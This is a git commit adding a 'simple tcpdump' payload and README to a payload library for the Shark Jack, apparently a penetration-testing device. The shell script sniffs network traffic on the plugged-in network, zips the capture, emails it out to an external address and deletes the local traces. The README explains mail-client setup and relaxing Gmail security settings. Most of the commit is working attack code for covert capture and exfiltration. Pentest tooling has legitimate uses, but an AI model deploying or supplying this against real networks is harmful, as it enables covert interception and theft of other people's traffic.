add tcpdump example + exfiltration via email (#52)

* add tcpdump example + exfiltration via email * update for PR
2022-01-20 00:40:11 +01:00 · 2022-01-20 00:40:11 +01:00 · b3cf17c1f7
parent e36ef11824
commit b3cf17c1f7
2 changed files with 100 additions and 0 deletions
--- a/payloads/library/recon/simple-tcpdump/README.md
+++ b/payloads/library/recon/simple-tcpdump/README.md
@ -0,0 +1,43 @@
+- Install following packages : ``` coreutils-timeout zip ```
+- Refer to this payload to install package https://github.com/julesbozouklian/shark_jack_payload/blob/main/payload/util/install_package.sh
+- Or SSH to the Shark jack and use following command : ``` opkg install coreutils-timeout zip ```
+
+
+- For the mail refer to this :
+- Install following packages : ``` msmtp mutt ```
+- Refer to this payload to install package https://github.com/julesbozouklian/shark_jack_payload/blob/main/payload/util/install_package.sh
+- Or SSH to the Shark jack and use following command : ``` opkg install msmtp mutt ```
+
+- Edit the ``` /etc/msmtprc ``` file
+```
+defaults
+auth           on
+tls            on
+tls_starttls   on
+tls_trust_file /etc/ssl/certs/ca-certificates.crt
+logfile        /var/log/msmtp.log
+
+account 	gmail
+auth 		plain
+host 		smtp.gmail.com
+port 		587
+from 		USER@gmail.com
+user 		USER@gmail.com
+password 	PASSWORD
+
+account default : gmail
+
+```
+
+- Edit the ``` nano ~/.muttrc ```
+```
+set sendmail="/usr/bin/msmtp"
+set use_from=yes
+set realname="SHARK JACK"
+set from=USER@gmail.com
+set envelope_from=yes
+```
+
+#### GMAIL
+If you use GMAIL, be sure to enable the "Allow less secure applications" setting  
+https://support.google.com/accounts/answer/6010255
--- a/payloads/library/recon/simple-tcpdump/payload.sh
+++ b/payloads/library/recon/simple-tcpdump/payload.sh
@ -0,0 +1,57 @@
+#!/bin/sh
+# Title:         Simple tcpdump
+# Description:   Exemple of tcpdump with exfiltrationvia email
+# Author:        Jules Bozouklian - bozou_client
+# Version:       1.0
+# Category:      Template
+#
+# LED SETUP (Magenta)... Setting logs and waiting for IP address from DHCP
+# LED FAIL (Red Blink)... Failed to update opkg or install package
+# LED FINISH (Green Fast Blink to Solid)... Package install or listsuccessful
+#
+
+LOG_DIR=/root/loot/recon/simple-tcpdump
+DATE=`date +"%Y-%m-%d"`
+TIMESTAMP=`date +"%Y-%m-%d %T"`
+INTERFACE="eth0"
+TIMEOUT="15"
+EMAIL_RECEIPT="EMAIL@DOMAIN.xyz"
+MUTT_FILE=/root/.muttrc
+
+LED SETUP
+
+NETMODE DHCP_CLIENT
+
+# Make log file
+mkdir -p $LOG_DIR
+LOG_FILE=$DATE"_$(find $LOG_DIR -type f | wc -l).log"
+LOG="$LOG_DIR/$LOG_FILE"
+
+# Wait until Shark Jack has an IP address
+while [ -z "$IPADDR" ]; do sleep 1 && IPADDR=$(ifconfig eth0 | grep "inet addr"); done
+
+LED ATTACK
+
+# TCPDUMP traffic on port 80 and 443
+echo -e "TCPDUMP start at `date`" >> $LOG
+# change the value of $TIMEOUT variable to change the duration of the tcpdump cature
+timeout $TIMEOUT tcpdump -i $INTERFACE -w capture.pcap
+echo -e "TCPDUMP end  at `date`" >> $LOG
+
+# create archive
+echo -e "Create archive  at `date`" >> $LOG
+zip -r /root/archive.zip /root/capture.pcap
+
+# send pcap by mail
+function sendEmail() {
+  echo "tcpdump pcap" | mutt -F $MUTT_FILE -a /root/archive.zip -s "Log $TIMESTAMP" -- $EMAIL_RECEIPT
+  sleep 5s
+}
+
+sendEmail
+
+# remove file
+rm /root/capture.pcap
+rm /root/archive.zip
+
+LED FINISH